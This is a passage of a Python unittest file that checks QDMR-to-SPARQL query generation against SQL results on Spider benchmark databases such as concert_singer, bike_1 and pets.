OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Average")),
])
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
qdmr = QdmrInstance(["select"] + ["project"] * 11 + ["union"],
[["concert"],
["concert_Name", "#1"],
["Theme", "#1"],
["Stadium_ID", "#1"],
["Year", "#1"],
["Stadium_ID", "#1"],
["Location", "#1"],
["Name", "#1"],
["Capacity", "#1"],
["Highest", "#1"],
["Lowest", "#1"],
["Average", "#1"],
["#1", "#2", "#3", "#4", "#5", "#6", "#7", "#8", "#9", "#10", "#11", "#12"],
])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_table_grounding("concert"),
GroundingIndex(1,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(2,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,0,"Stadium_ID") : GroundingKey.make_column_grounding("concert", "Stadium_ID"),
GroundingIndex(4,0,"Year") : GroundingKey.make_column_grounding("concert", "Year"),
GroundingIndex(5,0,"Stadium_ID") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(6,0,"Location") : GroundingKey.make_column_grounding("stadium", "Location"),
GroundingIndex(7,0,"Name") : GroundingKey.make_column_grounding("stadium", "Name"),
GroundingIndex(8,0,"Capacity") : GroundingKey.make_column_grounding("stadium", "Capacity"),
GroundingIndex(9,0,"Highest") : GroundingKey.make_column_grounding("stadium", "Highest"),
GroundingIndex(10,0,"Lowest") : GroundingKey.make_column_grounding("stadium", "Lowest"),
GroundingIndex(11,0,"Average") : GroundingKey.make_column_grounding("stadium", "Average"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSqlWithNonUniqueArgmax(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_sql_non_unique_agrmax(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
sql_query = "SELECT concert_Name, year FROM concert ORDER BY year DESC LIMIT 1 "
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_Name ?Year1
WHERE
{
{
SELECT (max(?Year) as ?max)
{
?c_id arc:concert:Year ?Year.
}
}
?c_id arc:concert:Year ?Year1.
FILTER(?Year1 = ?max).
?c_id arc:concert:concert_Name ?concert_Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Year"))])
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
weak_mode_argmax=True,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_sql_non_unique_agrmax_no_max_in_output(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
sql_query = "SELECT concert_Name FROM concert ORDER BY year DESC LIMIT 1 "
qdmr = QdmrInstance(["select", "project", "superlative"],
[["concert_Name"],
["Year", "#1"],
["max", "#1", "#2"],
])
grounding = { GroundingIndex(0,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"Year") : GroundingKey.make_column_grounding("concert", "Year"),
GroundingIndex(2,0,"max") : GroundingKey.make_comparative_grounding("max", None),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
weak_mode_argmax=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderWeirdTypes(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_train(self):
"""Test an entry from spider dataset
"""
split_name = "train"
db_id = "bike_1"
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = "SELECT id, zip_code FROM trip where id = 900630 order by zip_code"
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?trip ?zip_code
WHERE
{
?trip arc:trip:zip_code ?zip_code.
FILTER(?trip = key:trip:id:0000000000900630).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("trip", "id")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("trip", "zip_code"))])
# break_program:
qdmr = QdmrInstance(["select", "project", "union", "comparative", "sort"],
[["trip_id"],
["zip_code", "#1"],
["#1", "#2"],
["#3", "#2", "= 900630"],
["#4", "#2"]
])
grounding = {}
grounding[GroundingIndex(0,0,"trip_id")] = GroundingKey.make_table_grounding("trip")
grounding[GroundingIndex(1,0,"zip_code")] = GroundingKey.make_column_grounding("trip", "zip_code")
grounding[GroundingIndex(3,2,"= 900630")] = GroundingKey.make_comparative_grounding("=", "900630", GroundingKey.make_column_grounding("trip", "id"))
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev0(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 0
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT (COUNT(?singer) AS ?count)
WHERE
{
?singer arc:singer:Singer_ID ?singer.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program = ["SELECT['singers']", "AGGREGATE['count', '#1']"]
grounding = {GroundingIndex(0,0,"singers") : GroundingKey.make_table_grounding("singer")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev2(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 2
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[-1] = ["#5", "#4", "from oldest to youngest"]
# break_program = [
# "SELECT['singers']",
# "PROJECT['names of #REF', '#1']",
# "PROJECT["countries of #REF", '#1']",
# "PROJECT['ages of #REF', '#1']",
# "UNION['#2', '#3', '#4']",
# "SORT['#5', '#4', "from oldest to youngest"]"]
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,0,"names of #REF")] = GroundingKey.make_column_grounding("singer", "Name")
grounding[GroundingIndex(2,0,"countries of #REF")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(3,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(5,2,"from oldest to youngest")] = GroundingKey.make_sortdir_grounding(ascending=False)
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev5(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 5
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT (avg(?Age) as ?avg) (min(?Age) as ?min) (max(?Age) as ?max)
WHERE
{
?singer arc:singer:Age ?Age.
?singer arc:singer:Country ?Country.
FILTER(?Country = "France"^^xsd:string).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program =
# ["SELECT['singers']",
# "FILTER['#1', 'who are French']",
# "PROJECT['ages of #REF', '#2']",
# "AGGREGATE['avg', '#3']",
# "AGGREGATE['min', '#3']",
# "AGGREGATE['max', '#3']",
# "UNION['#4', '#5', '#6']"]
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,1,"who are French")] = GroundingKey.make_value_grounding("singer", "Country", "France")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev8(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_no_distinct(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 8
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
correct_sparql_query = textwrap.dedent("""\
SELECT ?Country
WHERE
{
?singer arc:singer:Age ?Age.
FILTER(?Age > 20.0).
?singer arc:singer:Country ?Country.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['singers']
# PROJECT['ages of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is higher than 20']
# PROJECT['distinct countries #REF are from', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(2,2,"is higher than 20")] = GroundingKey.make_comparative_grounding(">", "20")
grounding[GroundingIndex(3,0,"distinct countries #REF are from")] = GroundingKey.make_column_grounding("singer", "Country")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 8
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?Country
WHERE
{
?singer arc:singer:Age ?Age.
FILTER(?Age > 20.0).
?singer arc:singer:Country ?Country.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['singers']
# PROJECT['ages of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is higher than 20']
# PROJECT['distinct countries #REF are from', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(2,2,"is higher than 20")] = GroundingKey.make_comparative_grounding(">", "20")
grounding[GroundingIndex(3,0,"distinct countries #REF are from")] = GroundingKey.make_column_grounding("singer", "Country")
grounding["distinct"] = ["#4"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev10(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 10
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country (COUNT(?singer) AS ?count)
WHERE
{
?singer arc:singer:Country ?country
}
GROUP BY ?country
""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# PROJECT['singers in #REF', '#1']
# GROUP['count', '#2', '#1']
# UNION['#1', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(1,0,"singers in #REF")] = GroundingKey.make_table_grounding("singer")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev11(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 11
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country (COUNT(?singer) AS ?count)
WHERE
{
?singer arc:singer:Country ?country
}
GROUP BY ?country
""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# PROJECT['singers from #REF', '#1']
# GROUP['count', '#2', '#1']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(1,0,"singers from #REF")] = GroundingKey.make_table_grounding("singer")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev14(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 14
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# this query gives empty results, which makes it bad for testing
# all the capacities: ('4125',), ('2000',), ('10104',), ('4000',), ('3808',), ('3100',), ('3960',), ('11998',), ('52500',)
# switching 5000 in the query to 3100
correct_sparql_query = textwrap.dedent("""\
SELECT ?Location ?Name
WHERE
{
?stadium arc:stadium:Capacity ?Capacity.
FILTER(?Capacity >= 3100.0).
FILTER(?Capacity <= 10000.0).
?stadium arc:stadium:Location ?Location.
?stadium arc:stadium:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Location")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[2] = ["#1", "#2", "is at least 3100"]
# break_program:
# SELECT['stadiums']
# PROJECT['capacities of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is at least 3100',] # original version - 'is at least 5000' - leads to the empty result
# COMPARATIVE['#1', '#2', 'is at most 10000']
# INTERSECTION['#1', '#3', '#4']
# PROJECT['locations of #REF', '#5']
# PROJECT['names of #REF', '#5']
# UNION['#6', '#7']
grounding = {}
grounding[GroundingIndex(0,0,"stadiums")] = GroundingKey.make_table_grounding("stadium")
grounding[GroundingIndex(1,0,"capacities of #REF")] = GroundingKey.make_column_grounding("stadium", "Capacity")
grounding[GroundingIndex(2,2,"is at least 3100")] = GroundingKey.make_comparative_grounding(">=", "3100")
grounding[GroundingIndex(3,2,"is at most 10000")] = GroundingKey.make_comparative_grounding("<=", "10000")
grounding[GroundingIndex(5,0,"locations of #REF")] = GroundingKey.make_column_grounding("stadium", "Location")
grounding[GroundingIndex(6,0,"names of #REF")] = GroundingKey.make_column_grounding("stadium", "Name")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev20(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 20
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# CAUTION: this is a not so great test because it selects all the concerts
correct_sparql_query = textwrap.dedent("""\
SELECT (COUNT(?concerts) AS ?count)
WHERE
{
{
?concerts arc:concert:Year ?year.
FILTER(?year = 2014).
}
UNION
{
?concerts arc:concert:Year ?year
FILTER(?year = 2015)
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("concert"), schema), "count")])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['concerts']
# FILTER['#1', 'in 2014']
# FILTER['#1', 'in 2015']
# UNION['#2', '#3']
# AGGREGATE['count', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"concerts")] = GroundingKey.make_table_grounding("concert")
grounding[GroundingIndex(1,1,"in 2014")] = GroundingKey.make_value_grounding("concert", "Year", "2014")
grounding[GroundingIndex(2,1,"in 2015")] = GroundingKey.make_value_grounding("concert", "Year", "2015")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev24(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 24
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Show the stadium name and capacity with most number of concerts in year 2014 or after.
# SQL: SELECT T2.name , T2.capacity FROM concert AS T1 JOIN stadium AS T2 ON T1.stadium_id = T2.stadium_id WHERE T1.year >= 2014 GROUP BY T2.stadium_id ORDER BY count(*) DESC LIMIT 1
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Capacity
WHERE
{
{
SELECT DISTINCT ?stadium_3
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?stadium_1 (count(?concert) AS ?count)
WHERE
{
{
SELECT DISTINCT ?concert
WHERE
{
?Stadium_ID arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium.
?concert arc:concert:Stadium_ID ?Stadium_ID.
?concert arc:concert:Year ?Year.
FILTER(?Year >= 2014).
}
}
?concert arc:concert:Stadium_ID ?Stadium_ID_1.
?Stadium_ID_1 arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium_1.
?stadium_1 arc:stadium:Stadium_ID ?stadium_1.
}
GROUP BY ?stadium_1
}
}
}
{
SELECT ?stadium_3 (count(?concert_1) AS ?count_1)
WHERE
{
{
SELECT DISTINCT ?concert_1
WHERE
{
?Stadium_ID_1 arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium_2.
?concert_1 arc:concert:Stadium_ID ?Stadium_ID_1.
?concert_1 arc:concert:Year ?Year_1.
FILTER(?Year_1 >= 2014).
}
}
?concert_1 arc:concert:Stadium_ID ?Stadium_ID_3.
?Stadium_ID_3 arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium_3.
?stadium_3 arc:stadium:Stadium_ID ?stadium_3.
}
GROUP BY ?stadium_3
}
FILTER(?count_1 = ?max).
}
}
?stadium_3 arc:stadium:Name ?Name.
?stadium_3 arc:stadium:Capacity ?Capacity.
}""")
# qdmr = get_qdmr_from_break(split_name, i_query)
qdmr = QdmrInstance(["select", "project", "project", "comparative", "group", "superlative", "project", "project", "union"],
[["tbl:stadium"],
["tbl:concert", "#1"],
["col:concert:Year", "#2"],
["#2", "#3", "comparative:>=:2014:col:concert:Year"],
["count", "#4", "#1"],
["comparative:max:None", "#1", "#5"],
["col:stadium:Name", "#6"],
["col:stadium:Capacity", "#6"],
["#7", "#8"],
])
# break_program:
# 1. SELECT[tbl:stadium]
# 2. PROJECT[tbl:concert, #1]
# 3. PROJECT[col:concert:Year, #2]
# 4. COMPARATIVE[#2, #3, comparative:>=:2014:col:concert:Year]
# 5. GROUP[count, #4, #1]
# 6. SUPERLATIVE[comparative:max:None, #1, #5]
# 7. PROJECT[col:stadium:Name, #6]
# 8. PROJECT[col:stadium:Capacity, #6]
# 9. UNION[#7, #8]
grounding = {}
grounding[GroundingIndex(0,0,"tbl:stadium")] = GroundingKey.make_table_grounding("stadium")
grounding[GroundingIndex(1,0,"tbl:concert")] = GroundingKey.make_table_grounding("concert")
grounding[GroundingIndex(2,0,"col:concert:Year")] = GroundingKey.make_column_grounding("concert", "Year")
grounding[GroundingIndex(3,2,"comparative:>=:2014:col:concert:Year")] = GroundingKey.make_comparative_grounding(">=", "2014", GroundingKey.make_column_grounding("concert", "Year"))
grounding[GroundingIndex(5,0,"comparative:max:None")] = GroundingKey.make_comparative_grounding("max", None)
grounding[GroundingIndex(6,0,"col:stadium:Name")] = GroundingKey.make_column_grounding("stadium", "Name")
grounding[GroundingIndex(7,0,"col:stadium:Capacity")] = GroundingKey.make_column_grounding("stadium", "Capacity")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev30(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 30
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Show countries where a singer above age 40 and a singer below 30 are from .
# SQL: select country from singer where age > 40 intersect select country from singer where age < 30
correct_sparql_query = textwrap.dedent("""\
SELECT ?Country
WHERE
{
{
SELECT ?Country
WHERE
{
?singer arc:singer:Country ?Country.
?singer arc:singer:Age ?Age.
FILTER(?Age > 40).
}
GROUP BY ?Country
}
?singer_1 arc:singer:Country ?Country.
?singer_1 arc:singer:Age ?Age_1.
FILTER(?Age_1 < 30).
}
GROUP BY ?Country""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# PROJECT['singers from #REF', '#1']
# PROJECT['ages of #REF', '#2']
# COMPARATIVE['#1', '#3', 'is above 40']
# COMPARATIVE['#1', '#3', 'is below 30']
# INTERSECTION['#1', '#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(1,0,"singers from #REF")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(3,2,"is above 40")] = GroundingKey.make_comparative_grounding(">", "40")
grounding[GroundingIndex(4,2,"is below 30")] = GroundingKey.make_comparative_grounding("<", "30")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev39(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 39
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: what is the name and nation of the singer who have a song having 'Hey' in its name?
# SQL: SELECT name , country FROM singer WHERE song_name LIKE '%Hey%'
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Country
WHERE
{
?singer arc:singer:Song_Name ?Song_Name.
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?Country.
FILTER(REGEX(STR(?Song_Name), "(.*hey.*)", "i"))
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['singers']
# FILTER['#1', 'who have a song having Hey in its name']
# PROJECT['the name of #REF', '#2']
# PROJECT['the nation of #REF', '#2']
# UNION['#3', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,1,"who have a song having Hey in its name")] = GroundingKey.make_comparative_grounding("like", "hey", GroundingKey.make_column_grounding("singer", "Song_Name"))
grounding[GroundingIndex(2,0,"the name of #REF")] = GroundingKey.make_column_grounding("singer", "Name")
grounding[GroundingIndex(3,0,"the nation of #REF")] = GroundingKey.make_column_grounding("singer", "Country")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev47(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 47
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: what is the name and nation of the singer who have a song having 'Hey' in its name?
# SQL is wrong: select weight from pets order by pet_age limit 1
correct_sparql_query = textwrap.dedent("""\
SELECT ?weight
WHERE
{
{
SELECT ?PetType_1 ?Pets_1
WHERE
{
{
SELECT (min(?pet_age) AS ?min)
WHERE
{
?Pets arc:Pets:PetType ?PetType.
FILTER(?PetType = "dog").
?Pets arc:Pets:pet_age ?pet_age.
}
}
?Pets_1 arc:Pets:PetType ?PetType_1.
FILTER(?PetType_1 = "dog").
?Pets_1 arc:Pets:pet_age ?pet_age_1.
FILTER(?pet_age_1 = ?min).
}
GROUP BY ?Pets_1
}
?Pets_1 arc:Pets:weight ?weight.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# SELECT['dogs']
# PROJECT['age of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is youngest']
# PROJECT['weight of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"dogs")] = GroundingKey.make_value_grounding("Pets", "PetType", "dog")
grounding[GroundingIndex(1,0,"age of #REF")] = GroundingKey.make_column_grounding("Pets", "pet_age")
grounding[GroundingIndex(2,2,"is youngest")] = GroundingKey.make_comparative_grounding("min", None)
